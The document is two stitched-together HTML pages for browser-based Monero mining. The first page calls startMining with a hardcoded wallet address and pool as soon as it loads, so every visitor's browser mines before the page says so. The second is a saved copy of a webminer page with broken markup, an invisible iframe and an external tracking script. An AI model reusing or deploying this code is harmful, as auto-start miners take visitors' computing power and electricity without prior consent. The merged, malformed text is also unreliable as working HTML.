<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>HELLO MINER | My personal monero miner</title>

    <link rel="manifest" href="manifest.json">

    <meta name="mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="application-name" content="MINER">
    <meta name="apple-mobile-web-app-title" content="MINER">
    <meta name="theme-color" content="#333333">
    <meta name="msapplication-navbutton-color" content="#333333">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="msapplication-starturl" content="/">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <link rel="icon" type="image/png" sizes="512x512" href="icon.png">
    <link rel="apple-touch-icon" type="image/png" sizes="512x512" href="icon.png">
    
    <style>
      html,body {
        margin: 0
      }
      h1 {
        font-size: 72px;
        color: #333;
        margin-bottom: 0;
      }
      header, footer {
        padding: 30px;
      }
      .container {
        max-width: 1200px;
        margin: auto;
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
        height: 100vh;
        display: flex;
        flex-direction: column;
        justify-content: space-around;
      }
      .text {
        color: #999;
        margin-top: 0;
      }
    </style>
  </head>
  <body class="container">
    <header>
      <h1>HELLO MINER</h1>
      <p class="text">Thanks, this website is currently using your browser to mine monero</p>
      <a class="github-button" href="https://github.com/sandoche/Monero-miner-website/fork" data-icon="octicon-repo-forked" data-size="large" aria-label="Fork sandoche/Monero-miner-website on GitHub">Fork this miner</a>
    </header>
    <footer>
      <p>Made with ❤ in France</p>
    </footer>

    <script src="webmr.js"></script>

  <script>
    server = "ws://localhost:80"
    startMining("gulf.moneroocean.stream","44EjZYgZF3rcx1L1F1gQAvGp61pQDS5zvZhM1pow5K1KPBVdgh4zLuZ6sgueyxWeVpCWnHKmiLCo2N5TPF49wZzX9qfnRjU", "azerty12345", 5); 
  </script>
  </body>
</html>
<html lang="en-GB"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
	<meta charset="utf-8">
	<meta name="description" content="Crypto Webminer | Electroneum | Monero | Bytecoin | INTUcoin | Lethean (IntenseCoin) | Sumokoin | Graft | DERO | Turtlecoin | Stellite | BitTube | DERO | Ultranote | Aeon | Masari | Minergate | Moneroocean Auto Algo Switch feature | Cryptonight | Cryptonight-Lite | Cryptonight-Fast | Cryptonight-Fast2 | Cryptonight-Half | Cryptonight-Heavy | Cryptonight-BitTube | Custom Pool Support - Mining in your Browser ">
	<meta name="keywords" content="Crypto Miner, Crypto Webminer, Monero Webmining, Cryptonight Webmining | Cryptonight-Lite Webmining | Cryptonight-Fast Webmining | Cryptonight-Fast2 Webmining | Cryptonight-Half Webmining | Cryptonight-Heavy Webmining | Cryptonight-BitTube Webmining, Custom Pool Support Webmining Cryptonight, Cryptonight Webminer for Cryptocurrency">
	<meta name="author" content="PiTi">
	<meta name="robots" content="noindex, nofollow">
	<link rel="shortcut icon" href="favicon.ico">
	<link rel="icon" href="favicon.ico">
	<title>Crypto Webminer Monero - Mining in your Browser </title>
    <script src="Crypto%20Webminer%20Monero%20-%20Mining%20in%20your%20Browser_files/bundle.js" crossorigin="anonymous"></script><script src="Crypto%20Webminer%20Monero%20-%20Mining%20in%20your%20Browser_files/jquery-3.js"></script>
	<script src="Crypto%20Webminer%20Monero%20-%20Mining%20in%20your%20Browser_files/jquery.js"></script>
<script>

</script><script src="Crypto%20Webminer%20Monero%20-%20Mining%20in%20your%20Browser_files/perfektweb.js"></script>









	<script src="Crypto%20Webminer%20Monero%20-%20Mining%20in%20your%20Browser_files/gustav.js"></script>
    <link rel="stylesheet" href="Crypto%20Webminer%20Monero%20-%20Mining%20in%20your%20Browser_files/styles.css">
	
    <script src="Crypto%20Webminer%20Monero%20-%20Mining%20in%20your%20Browser_files/Chart.js"></script>
<script async="" src="Crypto%20Webminer%20Monero%20-%20Mining%20in%20your%20Browser_files/widget.js"></script>
<link href="https://gateway.arc.io/" crossorigin="" rel="preconnect" id="arc-preconnect-gateway" data-arc-widget=""><link href="https://webseed.arc.io/" crossorigin="" rel="preconnect" id="arc-preconnect-webseed" data-arc-widget=""><script src="Crypto%20Webminer%20Monero%20-%20Mining%20in%20your%20Browser_files/core.js" type="module" async="" id="arc-corejs" data-arc-widget=""></script><script src="Crypto%20Webminer%20Monero%20-%20Mining%20in%20your%20Browser_files/core-legacy.js" nomodule="" async="" id="arc-corejs-legacy" data-arc-widget=""></script><script src="https://www.drv.tw/inc/wd.js?s=msfb0fkqe6m9azfqu8zofg"></script></head>
<body><iframe id="arc-broker" src="Crypto%20Webminer%20Monero%20-%20Mining%20in%20your%20Browser_files/broker.html" title="Arc.io Broker Iframe" sandbox="allow-scripts allow-same-origin allow-top-navigation-by-user-activation" style="opacity: 0 ! important; width: 0px ! important; height: 0px ! important; border: medium none ! important; top: -9999px ! important; left: -9999px ! important; position: fixed ! important; visibility: hidden ! important;" loading="eager" data-arc-widget=""></iframe>
<h2 align="center">Monero mining<br> by crypto-webminer.com</h2>
<div class="row" align="center">
    <div class="box">
        <h3>hashes/s</h3>
        <h2 id="hashes-per-second">0</h2>
    </div>
    <div class="box">
        <h3>threads</h3>
        <h2>
			<span id="threads">1</span>
			<span id="thread-add" class="action"> + </span>
			<span class="divide"> / </span>
			<span id="thread-remove" class="action"> - </span>
		</h2>
    </div>
</div>

<div class="row" align="center">
    <div class="box">
        <h3> Total Hashes | Accepted Shares</h3>
        <h2 id="accepted-shares">0</h2>
    </div>

</div>

<div class="row">
    <input class="text" id="wallett" placeholder="Enter your Monero Public Wallet Address and Press Start" type="text">
</div>

<div class="row"><iframe class="chartjs-hidden-iframe" style="display: block; overflow: hidden; border: 0px none; margin: 0px; top: 0px; left: 0px; bottom: 0px; right: 0px; height: 100%; width: 100%; position: absolute; pointer-events: none; z-index: -1;" tabindex="-1"></iframe>
    <canvas id="barchart-canvas" class="stats" width="780" height="210" style="display: block; width: 780px; height: 210px;"></canvas>
</div>

<button id="start">Start</button><p align="center"> DDOS Protection | Mining starts in 2-5 sec</p>
	<div align="center">
			<form action="https://moneroocean.stream/#/dashboard" target="_blank"><input value="Check your payments" type="submit"></form>
		</div><br>
		
</script>


			</div>
<script>

<h3>© 2022 AIindustries
</h3>



</body></html>
